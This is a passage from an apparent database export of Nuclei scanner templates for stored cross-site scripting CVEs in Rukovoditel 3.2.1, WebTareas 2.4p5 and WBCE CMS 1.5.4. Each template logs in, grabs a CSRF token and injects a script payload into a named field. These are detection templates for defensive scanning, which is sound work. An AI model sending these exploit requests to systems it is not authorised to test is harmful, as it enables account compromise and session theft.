https://nvd.nist.gov/vuln/detail/CVE-2022-44947\n - http://rukovoditel.com\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-44947\n cwe-id: CWE-79\n epss-score: 0.00109\n epss-percentile: 0.43483\n cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: rukovoditel\n product: rukovoditel\n shodan-query: http.favicon.hash:-1499940355\n tags: cve2022,cve,rukovoditel,stored-xss,xss,authenticated\n\nhttp:\n - raw:\n - |\n GET /index.php?module=users/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /index.php?module=users/login&action=login HTTP/1.1\n Host: {{Hostname}}\n 
Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&username={{username}}&password={{password}}\n - |\n POST /index.php?module=entities/listing_highlight&action=save&entities_id=24&token={{nonce}} HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&is_active=1&fields_id=193&fields_values%5B%5D=67&bg_color=&sort_order=&notes=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n\n redirects: true\n max-redirects: 2\n matchers:\n - type: dsl\n dsl:\n - 'status_code_3 == 200'\n - 'contains(content_type_3, \"text/html\")'\n - 'contains(body_3, \"\")'\n - 'contains(body_3, \"rukovoditel\")'\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - 'id=\"form_session_token\" value=\"(.*)\" type=\"hidden\"'\n internal: true\n# digest: 4a0a00473045022078e8f384c073f04187e7ecaa23493ea0407fa54e1c570bdc4a4c07f2c0e0aeb7022100c361072086badba50693529add0141de6f5fd89d5d8575733ec9c8add9f81bdd:922c64590222798bb761d5b6d8e72950", "hash": "c464a9de1f393dc6ed800f160331a8a1", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085c4" }, "name": "CVE-2022-44948.yaml", "content": "id: CVE-2022-44948\n\ninfo:\n name: Rukovoditel <= 3.2.1 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Entities Group feature at /index.php?module=entities/entities_groups. 
This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field after clicking \"Add\".\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.\n remediation: |\n Upgrade Rukovoditel to a version higher than 3.2.1 or apply the vendor-provided patch to mitigate the XSS vulnerability.\n reference:\n - https://github.com/anhdq201/rukovoditel/issues/8\n - http://rukovoditel.com/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-44948\n - http://rukovoditel.com\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-44948\n cwe-id: CWE-79\n epss-score: 0.00091\n epss-percentile: 0.38514\n cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: rukovoditel\n product: rukovoditel\n tags: cve,cve2022,rukovoditel,xss,stored-xss,authenticated\n\nhttp:\n - raw:\n - |\n GET /index.php?module=users/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /index.php?module=users/login&action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&username={{username}}&password={{password}}\n - |\n POST /index.php?module=entities/entities_groups&action=save&token={{nonce}} HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0\n\n redirects: true\n max-redirects: 2\n matchers:\n - type: dsl\n dsl:\n - 'status_code_3 == 200'\n - 'contains(content_type_3, \"text/html\")'\n - 'contains(body_3, \"\")'\n - 'contains(body_3, \"rukovoditel\")'\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - 
'id=\"form_session_token\" value=\"(.*)\" type=\"hidden\"'\n internal: true\n# digest: 490a0046304402205b6515306a5ef9306b7d686e82462ce1df63dce1c25583df5601045b4cf4a31d022078af5b19991d9970bb152e4c5a8568dd4bfc3f29ea04e457305f13211933789f:922c64590222798bb761d5b6d8e72950", "hash": "225d6ce7f506ddf8967ddaa6dc172efc", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085c5" }, "name": "CVE-2022-44949.yaml", "content": "id: CVE-2022-44949\n\ninfo:\n name: Rukovoditel <= 3.2.1 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at /index.php?module=entities/fields&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Short Name field.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.\n remediation: |\n Upgrade Rukovoditel to version 3.2.2 or later to mitigate the XSS vulnerability.\n reference:\n - https://github.com/anhdq201/rukovoditel/issues/12\n - http://rukovoditel.com/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-44949\n - http://rukovoditel.com\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-44949\n cwe-id: CWE-79\n epss-score: 0.00091\n epss-percentile: 0.37842\n cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: rukovoditel\n product: rukovoditel\n tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated,intrusive\n\nhttp:\n - raw:\n - |\n GET /index.php?module=users/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /index.php?module=users/login&action=login HTTP/1.1\n Host: 
{{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&username={{username}}&password={{password}}\n - |\n POST /index.php?module=entities/fields&action=save&token={{nonce}} HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfKx13B5QBU5Sccgf\n\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"form_session_token\"\n\n {{nonce}}\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"entities_id\"\n\n 24\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"forms_tabs_id\"\n\n 29\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"name\"\n\n test\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"short_name\"\n\n \n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"type\"\n\n fieldtype_input\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"fields_configuration[width]\"\n\n input-small\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"fields_configuration[default_value]\"\n\n\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"fields_configuration[is_unique]\"\n\n 0\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"fields_configuration[unique_error_msg]\"\n\n\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"required_message\"\n\n\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"tooltip\"\n\n\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"tooltip_item_page\"\n\n\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"access_template\"\n\n\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; 
name=\"access[5]\"\n\n yes\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"access[4]\"\n\n yes\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"notes\"\n\n\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf--\n\n redirects: true\n max-redirects: 3\n matchers:\n - type: dsl\n dsl:\n - status_code_3 == 200\n - contains(content_type_3, \"text/html\")\n - contains(body_3, \"\")\n - contains(body_3, \"rukovoditel\")\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - id=\"form_session_token\" value=\"(.*)\" type=\"hidden\"\n internal: true\n# digest: 4a0a00473045022037ac8cfd48d6e676a3f4070803b999e42015a084c80c82903af299f909a3f4c0022100d3e3d7588abcfac6a671c786adbb650b7df45706ff32d77b8cd302a48ee9b9f4:922c64590222798bb761d5b6d8e72950", "hash": "c0c824e1d7adf7c4ca887527c12e976b", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085c6" }, "name": "CVE-2022-44950.yaml", "content": "id: CVE-2022-44950\n\ninfo:\n name: Rukovoditel <= 3.2.1 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at /index.php?module=entities/fields&entities_id=24. 
This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.\n remediation: |\n Upgrade Rukovoditel to a version higher than 3.2.1 to mitigate the XSS vulnerability.\n reference:\n - https://github.com/anhdq201/rukovoditel/issues/10\n - http://rukovoditel.com/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-44950\n - http://rukovoditel.com\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-44950\n cwe-id: CWE-79\n epss-score: 0.00091\n epss-percentile: 0.37842\n cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: rukovoditel\n product: rukovoditel\n tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated,intrusive\n\nhttp:\n - raw:\n - |\n GET /index.php?module=users/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /index.php?module=users/login&action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&username={{username}}&password={{password}}\n - |\n POST /index.php?module=entities/fields&action=save&token={{nonce}} HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfKx13B5QBU5Sccgf\n\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"form_session_token\"\n\n {{nonce}}\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"entities_id\"\n\n 24\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"forms_tabs_id\"\n\n 29\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"name\"\n\n \n 
------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"short_name\"\n\n test\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"type\"\n\n fieldtype_input\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"fields_configuration[width]\"\n\n input-small\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"fields_configuration[default_value]\"\n\n\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"fields_configuration[is_unique]\"\n\n 0\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"fields_configuration[unique_error_msg]\"\n\n\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"required_message\"\n\n\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"tooltip\"\n\n\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"tooltip_item_page\"\n\n\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"access_template\"\n\n\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"access[5]\"\n\n yes\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"access[4]\"\n\n yes\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"notes\"\n\n\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf--\n\n redirects: true\n max-redirects: 3\n matchers:\n - type: dsl\n dsl:\n - status_code_3 == 200\n - contains(content_type_3, \"text/html\")\n - contains(body_3, \"\")\n - contains(body_3, \"rukovoditel\")\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - id=\"form_session_token\" value=\"(.*)\" type=\"hidden\"\n internal: true\n# digest: 
4a0a00473045022001a28e54084dcf3166039fad4b05645b273c717120b1d20a00477f3fef70fe2d022100b25e6ef84ecf7425a03c0eb0b95ee1e0c051e5d3e099755d74b83057bc955aae:922c64590222798bb761d5b6d8e72950", "hash": "3e342cd6d95bdb3eab075b1e025cb2c2", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085c7" }, "name": "CVE-2022-44951.yaml", "content": "id: CVE-2022-44951\n\ninfo:\n name: Rukovoditel <= 3.2.1 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Form tab function at /index.php?module=entities/forms&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.\n remediation: |\n Upgrade Rukovoditel to a version higher than 3.2.1 to mitigate the XSS vulnerability.\n reference:\n - https://github.com/anhdq201/rukovoditel/issues/11\n - http://rukovoditel.com/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-44951\n - http://rukovoditel.com\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-44951\n cwe-id: CWE-79\n epss-score: 0.00091\n epss-percentile: 0.37842\n cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: rukovoditel\n product: rukovoditel\n tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated\n\nhttp:\n - raw:\n - |\n GET /index.php?module=users/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /index.php?module=users/login&action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n 
form_session_token={{nonce}}&username={{username}}&password={{password}}\n - |\n POST /index.php?module=entities/forms&action=save_tab&token={{nonce}} HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&entities_id=24&name=%3cscript%3ealert(document.domain)%3c%2fscript%3e&description=\n\n redirects: true\n matchers:\n - type: dsl\n dsl:\n - 'status_code_3 == 200'\n - 'contains(content_type_3, \"text/html\")'\n - 'contains(body_3, \"\")'\n - 'contains(body_3, \"rukovoditel\")'\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - 'id=\"form_session_token\" value=\"(.*)\" type=\"hidden\"'\n internal: true\n# digest: 4b0a00483046022100f6a6e75d3fcbeefb7bfe70fa11407ec0b7055b0830115dccaed3687cde983b03022100cb450ef92e316a1a23d3173d3838b7b51de7154dc44f3b963cda8866e4e95e59:922c64590222798bb761d5b6d8e72950", "hash": "21c58f271bc48c46e6e6bee8f1a0760b", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085c8" }, "name": "CVE-2022-44952.yaml", "content": "id: CVE-2022-44952\n\ninfo:\n name: Rukovoditel <= 3.2.1 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in /index.php?module=configuration/application. 
This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Copyright Text field after clicking \"Add\".\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.\n remediation: |\n Upgrade Rukovoditel to a version higher than 3.2.1 to mitigate the XSS vulnerability.\n reference:\n - https://github.com/anhdq201/rukovoditel/issues/9\n - http://rukovoditel.com/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-44952\n - http://rukovoditel.com\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-44952\n cwe-id: CWE-79\n epss-score: 0.07295\n epss-percentile: 0.93905\n cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 4\n vendor: rukovoditel\n product: rukovoditel\n tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated,intrusive\n\nhttp:\n - raw:\n - |\n GET /index.php?module=users/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /index.php?module=users/login&action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&username={{username}}&password={{password}}\n - |\n POST /index.php?module=configuration/save&redirect_to=configuration/application HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMh2HSjWbM7zJjWOA\n\n ------WebKitFormBoundaryMh2HSjWbM7zJjWOA\n Content-Disposition: form-data; name=\"form_session_token\"\n\n {{nonce}}\n ------WebKitFormBoundaryMh2HSjWbM7zJjWOA\n Content-Disposition: form-data; name=\"CFG[APP_NAME]\"\n\n Test\n ------WebKitFormBoundaryMh2HSjWbM7zJjWOA\n Content-Disposition: form-data; name=\"CFG[APP_SHORT_NAME]\"\n\n test\n ------WebKitFormBoundaryMh2HSjWbM7zJjWOA\n 
Content-Disposition: form-data; name=\"APP_LOGO\"; filename=\"\"\n Content-Type: application/octet-stream\n\n\n ------WebKitFormBoundaryMh2HSjWbM7zJjWOA\n Content-Disposition: form-data; name=\"CFG[APP_LOGO]\"\n\n\n ------WebKitFormBoundaryMh2HSjWbM7zJjWOA\n Content-Disposition: form-data; name=\"CFG[APP_LOGO_URL]\"\n\n\n ------WebKitFormBoundaryMh2HSjWbM7zJjWOA\n Content-Disposition: form-data; name=\"APP_FAVICON\"; filename=\"\"\n Content-Type: application/octet-stream\n\n\n ------WebKitFormBoundaryMh2HSjWbM7zJjWOA\n Content-Disposition: form-data; name=\"CFG[APP_FAVICON]\"\n\n\n ------WebKitFormBoundaryMh2HSjWbM7zJjWOA\n Content-Disposition: form-data; name=\"CFG[APP_COPYRIGHT_NAME]\"\n\n \n ------WebKitFormBoundaryMh2HSjWbM7zJjWOA\n Content-Disposition: form-data; name=\"CFG[APP_LANGUAGE]\"\n\n english.php\n ------WebKitFormBoundaryMh2HSjWbM7zJjWOA\n Content-Disposition: form-data; name=\"CFG[APP_SKIN]\"\n\n\n ------WebKitFormBoundaryMh2HSjWbM7zJjWOA\n Content-Disposition: form-data; name=\"CFG[APP_TIMEZONE]\"\n\n America/New_York\n ------WebKitFormBoundaryMh2HSjWbM7zJjWOA\n Content-Disposition: form-data; name=\"CFG[APP_ROWS_PER_PAGE]\"\n\n 10\n ------WebKitFormBoundaryMh2HSjWbM7zJjWOA\n Content-Disposition: form-data; name=\"CFG[APP_DATE_FORMAT]\"\n\n m/d/Y\n ------WebKitFormBoundaryMh2HSjWbM7zJjWOA\n Content-Disposition: form-data; name=\"CFG[APP_DATETIME_FORMAT]\"\n\n m/d/Y H:i\n ------WebKitFormBoundaryMh2HSjWbM7zJjWOA\n Content-Disposition: form-data; name=\"CFG[APP_NUMBER_FORMAT]\"\n\n 2/./*\n ------WebKitFormBoundaryMh2HSjWbM7zJjWOA\n Content-Disposition: form-data; name=\"CFG[APP_FIRST_DAY_OF_WEEK]\"\n\n 0\n ------WebKitFormBoundaryMh2HSjWbM7zJjWOA\n Content-Disposition: form-data; name=\"CFG[DROP_DOWN_MENU_ON_HOVER]\"\n\n 0\n ------WebKitFormBoundaryMh2HSjWbM7zJjWOA\n Content-Disposition: form-data; name=\"CFG[DISABLE_CHECK_FOR_UPDATES]\"\n\n 0\n ------WebKitFormBoundaryMh2HSjWbM7zJjWOA--\n - |\n @timeout: 5s\n GET /index.php?module=dashboard/ 
HTTP/1.1\n Host: {{Hostname}}\n\n redirects: true\n matchers:\n - type: dsl\n dsl:\n - status_code_4 == 200\n - contains(content_type_4, \"text/html\")\n - contains(body_4, \"\")\n - contains(body_4, \"rukovoditel\")\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - id=\"form_session_token\" value=\"(.*)\" type=\"hidden\"\n internal: true\n# digest: 490a0046304402202de06b8a6e888b2993c09a60cfd35c2c48341bc45d7140638b7da6a9f927e15c02205443f1e3d88ae7dca53733dc34930bd1491cd200d6b944d53412de96d56c8bd6:922c64590222798bb761d5b6d8e72950", "hash": "5a97746d747852c1ea8a88fcaa5505e4", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085c9" }, "name": "CVE-2022-44957.yaml", "content": "id: CVE-2022-44957\n\ninfo:\n name: WebTareas 2.4p5 - Cross-Site Scripting\n author: theamanrawat\n severity: medium\n description: |\n webtareas 2.4p5 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /clients/listclients.php. 
This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.\n reference:\n - http://webtareas.com/\n - https://github.com/anhdq201/webtareas/issues/11\n - https://nvd.nist.gov/vuln/detail/CVE-2022-44957\n - http://webtareas.com\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-44957\n cwe-id: CWE-79\n epss-score: 0.00091\n epss-percentile: 0.37842\n cpe: cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: webtareas_project\n product: webtareas\n tags: cve,cve2022,xss,webtareas,authenticated,intrusive,webtareas_project\n\nhttp:\n - raw:\n - |\n POST /general/login.php?session=false HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525\n\n -----------------------------3023071625140724693672385525\n Content-Disposition: form-data; name=\"action\"\n\n login\n -----------------------------3023071625140724693672385525\n Content-Disposition: form-data; name=\"loginForm\"\n\n {{username}}\n -----------------------------3023071625140724693672385525\n Content-Disposition: form-data; name=\"passwordForm\"\n\n {{password}}\n -----------------------------3023071625140724693672385525\n Content-Disposition: form-data; name=\"loginSubmit\"\n\n Log In\n -----------------------------3023071625140724693672385525--\n - |\n GET /clients/editclient.php? 
HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /clients/editclient.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=---------------------------34025600472463336623659912061\n\n -----------------------------34025600472463336623659912061\n Content-Disposition: form-data; name=\"csrfToken\"\n\n {{csrf}}\n -----------------------------34025600472463336623659912061\n Content-Disposition: form-data; name=\"action\"\n\n add\n -----------------------------34025600472463336623659912061\n Content-Disposition: form-data; name=\"cown\"\n\n 1\n -----------------------------34025600472463336623659912061\n Content-Disposition: form-data; name=\"cn\"\n\n {{randstr}}
    \n -----------------------------34025600472463336623659912061\n Content-Disposition: form-data; name=\"add\"\n\n\n -----------------------------34025600472463336623659912061\n Content-Disposition: form-data; name=\"zip\"\n\n\n -----------------------------34025600472463336623659912061\n Content-Disposition: form-data; name=\"ct\"\n\n\n -----------------------------34025600472463336623659912061\n Content-Disposition: form-data; name=\"cou\"\n\n\n -----------------------------34025600472463336623659912061\n Content-Disposition: form-data; name=\"wp\"\n\n\n -----------------------------34025600472463336623659912061\n Content-Disposition: form-data; name=\"fa\"\n\n\n -----------------------------34025600472463336623659912061\n Content-Disposition: form-data; name=\"url\"\n\n\n -----------------------------34025600472463336623659912061\n Content-Disposition: form-data; name=\"email\"\n\n\n -----------------------------34025600472463336623659912061\n Content-Disposition: form-data; name=\"curr\"\n\n\n -----------------------------34025600472463336623659912061\n Content-Disposition: form-data; name=\"wc\"\n\n 1\n -----------------------------34025600472463336623659912061\n Content-Disposition: form-data; name=\"pym\"\n\n 1\n -----------------------------34025600472463336623659912061\n Content-Disposition: form-data; name=\"pyt\"\n\n 7\n -----------------------------34025600472463336623659912061\n Content-Disposition: form-data; name=\"c\"\n\n\n -----------------------------34025600472463336623659912061\n Content-Disposition: form-data; name=\"ssc\"\n\n\n -----------------------------34025600472463336623659912061\n Content-Disposition: form-data; name=\"file1\"; filename=\"\"\n Content-Type: application/octet-stream\n\n\n -----------------------------34025600472463336623659912061\n Content-Disposition: form-data; name=\"attnam1\"\n\n\n -----------------------------34025600472463336623659912061\n Content-Disposition: form-data; name=\"atttmp1\"\n\n\n 
-----------------------------34025600472463336623659912061--\n\n host-redirects: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_3\n words:\n - '
    '\n - 'clients/listclients.php?'\n condition: and\n\n - type: word\n part: header_3\n words:\n - text/html\n\n extractors:\n - type: regex\n name: csrf\n group: 1\n regex:\n - 'name=\"csrfToken\" value=\"([0-9a-zA-Z]+)\"'\n internal: true\n# digest: 4a0a00473045022058e04c959164a6887128bff5e2c81ff9a549a4941e0adc621d267e956d6d1fe1022100d36b02df2b82b6dd9d1065d82767ab1ec79b2649450f25d69ecffca80b581608:922c64590222798bb761d5b6d8e72950", "hash": "78c252320a3f42f1cf190ed2f776f1be", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085ca" }, "name": "CVE-2022-45037.yaml", "content": "id: CVE-2022-45037\n\ninfo:\n name: WBCE CMS v1.5.4 - Cross Site Scripting (Stored)\n author: theamanrawat\n severity: medium\n description: |\n A cross-site scripting (XSS) vulnerability in /admin/users/index.php of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Display Name field.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Upgrade to the latest version of WBCE CMS or apply the necessary patches provided by the vendor to fix the Cross Site Scripting vulnerability.\n reference:\n - https://github.com/WBCE/WBCE_CMS\n - https://shimo.im/docs/dPkpKPQEjXfvYoqO/read\n - https://nvd.nist.gov/vuln/detail/CVE-2022-45037\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-45037\n cwe-id: CWE-79\n epss-score: 0.00092\n epss-percentile: 0.37956\n cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 5\n vendor: wbce\n product: wbce_cms\n tags: cve,cve2022,xss,wbce,cms,authenticated\n\nhttp:\n - raw:\n - |\n GET /admin/login/index.php HTTP/1.1\n Host: {{Hostname}}\n - |\n POST 
/admin/login/index.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n url=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login\n - |\n GET /admin/users/index.php HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /admin/users/index.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n formtoken={{formtoken}}&user_id=&username_fieldname={{username_fieldname_2}}&{{username_fieldname_2}}=test-{{randstr}}&password={{randstr}}&password2=&display_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email={{randstr}}%40gmail.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=\n - |\n GET /admin/users/ HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_5\n words:\n - \"\"\n - \"SESSION_TIMEOUT\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: username_fieldname\n group: 1\n regex:\n - 'name=\"username_fieldname\" value=\"(.*)\"'\n internal: true\n part: body\n\n - type: regex\n name: password_fieldname\n group: 